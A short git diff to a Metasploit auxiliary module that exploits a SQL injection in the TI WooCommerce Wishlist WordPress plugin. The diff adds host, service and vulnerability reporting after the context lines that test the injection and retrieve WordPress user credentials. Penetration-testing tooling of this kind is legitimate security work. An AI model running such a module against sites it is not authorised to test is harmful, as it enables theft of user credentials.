diff --git a/modules/auxiliary/scanner/http/wp_ti_woocommerce_wishlist_sqli.rb b/modules/auxiliary/scanner/http/wp_ti_woocommerce_wishlist_sqli.rb
index 14b56e17a391..896b5b31fd57 100644
--- a/modules/auxiliary/scanner/http/wp_ti_woocommerce_wishlist_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_ti_woocommerce_wishlist_sqli.rb
@@ -101,8 +101,28 @@ def run_host(_ip)
 
     if @sqli.test_vulnerable
       print_status('SQL Injection successful, retrieving user credentials...')
+
       wordpress_sqli_initialize(@sqli)
       wordpress_sqli_get_users_credentials(datastore['COUNT'])
+
+      report_host(host: ip)
+
+      report_service(
+        host: ip,
+        port: rport,
+        proto: 'tcp',
+        name: fullname,
+        info: description.strip
+      )
+
+      report_vuln(
+        host: ip,
+        port: rport,
+        proto: 'tcp',
+        name: fullname,
+        refs: references,
+        info: description.strip
+      )
     else
       fail_with(Failure::NotVulnerable, 'Target is not vulnerable to SQL injection.')
     end